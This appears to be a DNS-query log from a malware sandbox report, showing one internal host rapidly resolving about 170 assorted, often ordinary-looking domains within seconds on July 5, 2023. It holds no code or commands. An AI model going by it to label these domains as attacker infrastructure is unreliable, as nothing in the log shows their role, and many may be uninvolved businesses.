                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.442233086 CEST192.168.2.68.8.8.80xcfafStandard query (0)canasil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.445641994 CEST192.168.2.68.8.8.80x8deeStandard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.445970058 CEST192.168.2.68.8.8.80x364Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.449707985 CEST192.168.2.68.8.8.80xfadbStandard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.450053930 CEST192.168.2.68.8.8.80xc7beStandard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.452460051 CEST192.168.2.68.8.8.80x51c4Standard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.466373920 CEST192.168.2.68.8.8.80x91e3Standard query (0)pellys.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.467453957 CEST192.168.2.68.8.8.80x4408Standard query (0)gphpedit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.471101046 CEST192.168.2.68.8.8.80x2d13Standard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.473059893 CEST192.168.2.68.8.8.80xc9d3Standard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.474615097 CEST192.168.2.68.8.8.80xf912Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.494560003 CEST192.168.2.68.8.8.80x818Standard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.551739931 CEST192.168.2.68.8.8.80xed9cStandard query (0)nels.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.556260109 CEST192.168.2.68.8.8.80x66beStandard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.558682919 CEST192.168.2.68.8.8.80xf24cStandard query (0)vvsteknik.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.590281010 CEST192.168.2.68.8.8.80x13eStandard query (0)amic.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.590490103 CEST192.168.2.68.8.8.80xb7ebStandard query (0)yhsll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.592494011 CEST192.168.2.68.8.8.80xbb1eStandard query (0)lpver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.593693018 CEST192.168.2.68.8.8.80xb4bfStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.607017040 CEST192.168.2.68.8.8.80xf7b7Standard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.619512081 CEST192.168.2.68.8.8.80x6921Standard query (0)cyclad.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.624237061 CEST192.168.2.68.8.8.80x55c0Standard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.626765966 CEST192.168.2.68.8.8.80xe88cStandard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.652144909 CEST192.168.2.68.8.8.80x65f9Standard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.679925919 CEST192.168.2.68.8.8.80x65b5Standard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.726402044 CEST192.168.2.68.8.8.80x9ba0Standard query (0)bigzz.byA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.726865053 CEST192.168.2.68.8.8.80x7a93Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.735445976 CEST192.168.2.68.8.8.80x36dbStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.741247892 CEST192.168.2.68.8.8.80xef04Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.755016088 CEST192.168.2.68.8.8.80x5892Standard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.760283947 CEST192.168.2.68.8.8.80x1f66Standard query (0)popbook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.763020039 CEST192.168.2.68.8.8.80x70aStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.770533085 CEST192.168.2.68.8.8.80xbef5Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.772820950 CEST192.168.2.68.8.8.80xe51eStandard query (0)at-shun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.793685913 CEST192.168.2.68.8.8.80x172dStandard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.819292068 CEST192.168.2.68.8.8.80x2089Standard query (0)kumaden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.854077101 CEST192.168.2.68.8.8.80xc9a8Standard query (0)karmy.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.865434885 CEST192.168.2.68.8.8.80x56adStandard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.872464895 CEST192.168.2.68.8.8.80x4477Standard query (0)any-s.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.877409935 CEST192.168.2.68.8.8.80x4e88Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.929161072 CEST192.168.2.68.8.8.80x8c8dStandard query (0)s5w.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.929461956 CEST192.168.2.68.8.8.80x8130Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.933471918 CEST192.168.2.68.8.8.80xc925Standard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.943754911 CEST192.168.2.68.8.8.80xbc0dStandard query (0)angework.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.944237947 CEST192.168.2.68.8.8.80x3d8cStandard query (0)hazmatt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.956075907 CEST192.168.2.68.8.8.80xa1dfStandard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.960144043 CEST192.168.2.68.8.8.80x3a90Standard query (0)sidepath.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.965203047 CEST192.168.2.68.8.8.80x75e8Standard query (0)redgiga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.970372915 CEST192.168.2.68.8.8.80x5125Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.985219002 CEST192.168.2.68.8.8.80xd4aeStandard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.988385916 CEST192.168.2.68.8.8.80x4993Standard query (0)kustnara.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.990277052 CEST192.168.2.68.8.8.80x65aeStandard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.025161028 CEST192.168.2.68.8.8.80x2eb0Standard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.049998045 CEST192.168.2.68.8.8.80xc219Standard query (0)rokoron.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.050338030 CEST192.168.2.68.8.8.80x9936Standard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.055239916 CEST192.168.2.68.8.8.80xb8b2Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.074896097 CEST192.168.2.68.8.8.80x5917Standard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.095824003 CEST192.168.2.68.8.8.80x517bStandard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.099577904 CEST192.168.2.68.8.8.80xb85Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.102257967 CEST192.168.2.68.8.8.80x2d39Standard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.108083010 CEST192.168.2.68.8.8.80xa975Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.118386984 CEST192.168.2.68.8.8.80x1745Standard query (0)nme.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.122390985 CEST192.168.2.68.8.8.80xded7Standard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.123596907 CEST192.168.2.68.8.8.80x2f27Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.132431030 CEST192.168.2.68.8.8.80x4d7aStandard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.135013103 CEST192.168.2.68.8.8.80x5689Standard query (0)kewlmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.150137901 CEST192.168.2.68.8.8.80x9576Standard query (0)nekono.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.150137901 CEST192.168.2.68.8.8.80x909bStandard query (0)e-kami.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.150610924 CEST192.168.2.68.8.8.80xb350Standard query (0)dyag-eng.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.152597904 CEST192.168.2.68.8.8.80x6aacStandard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.168493032 CEST192.168.2.68.8.8.80x92a0Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.171638966 CEST192.168.2.68.8.8.80xc77eStandard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.176250935 CEST192.168.2.68.8.8.80xeab7Standard query (0)top1oil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.183406115 CEST192.168.2.68.8.8.80xb63eStandard query (0)okashimo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.228925943 CEST192.168.2.68.8.8.80x7b2eStandard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.229545116 CEST192.168.2.68.8.8.80x159bStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.243376970 CEST192.168.2.68.8.8.80xb7abStandard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.264422894 CEST192.168.2.68.8.8.80xada2Standard query (0)reproar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.270415068 CEST192.168.2.68.8.8.80x9669Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.289633989 CEST192.168.2.68.8.8.80x8cd6Standard query (0)xinhui.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.313194990 CEST192.168.2.68.8.8.80xba5dStandard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.325423002 CEST192.168.2.68.8.8.80xd243Standard query (0)jabian.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.329204082 CEST192.168.2.68.8.8.80x844eStandard query (0)absblast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.336211920 CEST192.168.2.68.8.8.80xd3acStandard query (0)rast.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.361197948 CEST192.168.2.68.8.8.80x666fStandard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.363686085 CEST192.168.2.68.8.8.80x929cStandard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.364864111 CEST192.168.2.68.8.8.80xc09eStandard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.396389008 CEST192.168.2.68.8.8.80x6b54Standard query (0)tbvlugus.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.433867931 CEST192.168.2.68.8.8.80xd141Standard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.440783978 CEST192.168.2.68.8.8.80xed49Standard query (0)keio-web.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.444900036 CEST192.168.2.68.8.8.80x2e61Standard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.444900036 CEST192.168.2.68.8.8.80x6096Standard query (0)fogra.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.447664022 CEST192.168.2.68.8.8.80x2e1cStandard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.448828936 CEST192.168.2.68.8.8.80x248aStandard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.450371027 CEST192.168.2.68.8.8.80x9338Standard query (0)deckoviny.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.450371027 CEST192.168.2.68.8.8.80x4b92Standard query (0)unicus.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.465713978 CEST192.168.2.68.8.8.80x836aStandard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.472398996 CEST192.168.2.68.8.8.80x17d6Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.477797031 CEST192.168.2.68.8.8.80xb1a6Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.517934084 CEST192.168.2.68.8.8.80x46f1Standard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.520467043 CEST192.168.2.68.8.8.80x6843Standard query (0)hubbikes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.583188057 CEST192.168.2.68.8.8.80xfa74Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.606471062 CEST192.168.2.68.8.8.80x818Standard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.614017963 CEST192.168.2.68.8.8.80xca44Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.655435085 CEST192.168.2.68.8.8.80x307dStandard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.672707081 CEST192.168.2.68.8.8.80xc4c3Standard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.674638987 CEST192.168.2.68.8.8.80x8ff7Standard query (0)scip.org.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.679769993 CEST192.168.2.68.8.8.80x5efStandard query (0)mkm-gr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.685446024 CEST192.168.2.68.8.8.80x35afStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.692240000 CEST192.168.2.68.8.8.80x4ae5Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.713470936 CEST192.168.2.68.8.8.80x5a29Standard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.720458984 CEST192.168.2.68.8.8.80x7b56Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.746747017 CEST192.168.2.68.8.8.80x47daStandard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.785597086 CEST192.168.2.68.8.8.80x9bb5Standard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.792479038 CEST192.168.2.68.8.8.80x220eStandard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.793751001 CEST192.168.2.68.8.8.80xfa9eStandard query (0)komie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.797468901 CEST192.168.2.68.8.8.80xb732Standard query (0)geecl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.812283993 CEST192.168.2.68.8.8.80xa2c8Standard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.847868919 CEST192.168.2.68.8.8.80x1652Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.850693941 CEST192.168.2.68.8.8.80xf68fStandard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.854393005 CEST192.168.2.68.8.8.80xc446Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.868237019 CEST192.168.2.68.8.8.80xbb28Standard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.868731976 CEST192.168.2.68.8.8.80x2c5eStandard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.895272970 CEST192.168.2.68.8.8.80xc150Standard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.900254965 CEST192.168.2.68.8.8.80x9cfaStandard query (0)touchfam.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.902107000 CEST192.168.2.68.8.8.80x5eefStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.919027090 CEST192.168.2.68.8.8.80x73baStandard query (0)akr.co.idA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.972939014 CEST192.168.2.68.8.8.80x5017Standard query (0)e-kami.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.994376898 CEST192.168.2.68.8.8.80x3a90Standard query (0)sidepath.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.031536102 CEST192.168.2.68.8.8.80x4b3cStandard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.051765919 CEST192.168.2.68.8.8.80xa1dfStandard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.088705063 CEST192.168.2.68.8.8.80x192aStandard query (0)top1oil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.093019962 CEST192.168.2.68.8.8.80xec31Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.102852106 CEST192.168.2.68.8.8.80x1e33Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.173067093 CEST192.168.2.68.8.8.80xc90eStandard query (0)fundeo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.180016041 CEST192.168.2.68.8.8.80xd894Standard query (0)yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.226037025 CEST192.168.2.68.8.8.80xd404Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.226336002 CEST192.168.2.68.8.8.80x637aStandard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.226701975 CEST192.168.2.68.8.8.80x5125Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.229630947 CEST192.168.2.68.8.8.80x7a0aStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.309408903 CEST192.168.2.68.8.8.80x9d9aStandard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.397407055 CEST192.168.2.68.8.8.80x5cefStandard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.430115938 CEST192.168.2.68.8.8.80xf6bbStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.435096979 CEST192.168.2.68.8.8.80x6001Standard query (0)umcor.amA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.438806057 CEST192.168.2.68.8.8.80x4307Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.504364014 CEST192.168.2.68.8.8.80x9d8dStandard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.530533075 CEST192.168.2.68.8.8.80xb7abStandard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.530533075 CEST192.168.2.68.8.8.80x92a0Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.558182001 CEST192.168.2.68.8.8.80x5d1eStandard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.561990023 CEST192.168.2.68.8.8.80xa007Standard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.653016090 CEST192.168.2.68.8.8.80x63d3Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.659049034 CEST192.168.2.68.8.8.80x248aStandard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.674690962 CEST192.168.2.68.8.8.80x7d81Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.742847919 CEST192.168.2.68.8.8.80xd826Standard query (0)gphpedit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.776123047 CEST192.168.2.68.8.8.80x85cdStandard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.780575991 CEST192.168.2.68.8.8.80x4ea7Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.789458036 CEST192.168.2.68.8.8.80xcff4Standard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.795054913 CEST192.168.2.68.8.8.80xb5eaStandard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.798211098 CEST192.168.2.68.8.8.80x851Standard query (0)s5w.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.858364105 CEST192.168.2.68.8.8.80x93a1Standard query (0)any-s.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.893913031 CEST192.168.2.68.8.8.80xbc1Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.926490068 CEST192.168.2.68.8.8.80xf68fStandard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.940294981 CEST192.168.2.68.8.8.80x6df1Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.943345070 CEST192.168.2.68.8.8.80x7d13Standard query (0)aoinko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:44.987499952 CEST192.168.2.68.8.8.80xb910Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.034178972 CEST192.168.2.68.8.8.80xbdb7Standard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.043829918 CEST192.168.2.68.8.8.80x106bStandard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.045620918 CEST192.168.2.68.8.8.80x9fb0Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.079884052 CEST192.168.2.68.8.8.80x159bStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.082499027 CEST192.168.2.68.8.8.80x6084Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.099184036 CEST192.168.2.68.8.8.80x10e1Standard query (0)k-nikko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.144504070 CEST192.168.2.68.8.8.80x52a6Standard query (0)dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.155560970 CEST192.168.2.68.8.8.80xe0dStandard query (0)hes.ptA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:45.197323084 CEST192.168.2.68.8.8.80x29dbStandard query (0)hamaker.netA (IP address)IN (0x0001)false
